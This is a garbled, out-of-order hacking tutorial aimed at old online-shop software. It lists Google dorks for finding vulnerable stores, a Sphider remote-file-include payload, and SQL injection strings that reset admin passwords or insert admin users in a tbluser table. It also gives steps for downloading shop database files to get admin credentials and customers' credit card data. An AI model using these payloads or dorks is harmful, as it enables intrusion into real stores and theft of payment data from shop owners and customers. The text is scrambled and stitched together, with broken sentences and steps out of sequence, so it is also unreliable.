Include "$include_dir/index_header.inc"
Exploitz : /index.php?include_dir=injekan.Hi there.
$include_dir = "./include" <- no patch here # Sphider Version 1.2.x (include_dir) remote file include Then guess admin link by add these above data until you find admin links You'll see something like: ( lot of them) The number of column in the two selected tables or queries of a union queries do not match.
4/ add 2,3,4,5,6.until you see a nice table >error: 5' union select 1 from tbluser "having 1=1-sp_password. If you don't see error then change ip to cat
3/if this shop has error then add this: %20union%20select%201%20from%20tbluser"having%201 = 1-sp_password >error: Microsolf JET database engine error "80040e14"./shop$db.asp, line467 In db look for access to find pass and user of shop admins.
1/search google: allinurl:" shopdisplayproducts.asp?id= Target for dl the data base :-> (doesn't need to be like this) (this is also good file sdatapdshoppro.mdb, access.mdb) :-> allinurl:/shop/category.asp/catid=
After getting that page look for dbname and path.
To change the admin password, enter the following keyword:
fldusername='admin'-&SubCategory=All&action.x=33&action.y=6 Don't forget to change and; what you set them to is up to you.
Keyword=&category=3) update tbluser set fldaccess='1' where Keyword=&category=5) update tbluser set fldpassword='' where
fldusername=''-&SubCategory=All&action.x=33&action.y=6 Keyword=&category=5) insert into tbluser (fldusername) values When you find a target put this in search box Google dork :-> allinurl:/vpasp/shopsearch.asp
Google dork :-> allinurl: /cgi-local/shopper.cgi
Target looks like :-> (big letters and numbers )
Exploit :-> change the proddtail.asp?prod=SG369 with fpdb/vsproducts.mdb Google dork :-> allinurlroddetail.asp?prod= Paste one by one, file.C32 at the end url has been modified earlier, with the format The substitute string url tsb.To like this: Gotten file contained the data cc
Copy some file.C32 was or all of them to notepad or the program text the other editor. If shares this was gotten list file the format/the suffix.C32 significant in site. When we found Page error dig installation information beneath it, meant us was successful! To know xdatabase you need to rename shopadmin.asp to shopdbtest.asp If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all then try to find the admin login page and enter the default passwords which are The admin login page is usually located here
And you should even be able to find the admin username and password for the website. Inside you should be able to find credit card information. ****://***./shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at If you see the error message you have to try this : The most important thing here is xDatabase
Xdatabasetype xEmail xEmailName xEmailSubject xEmailSystem xEmailType xOrdernumber. The page will be like this > ****://***./shop/shopdisplaycategories.asp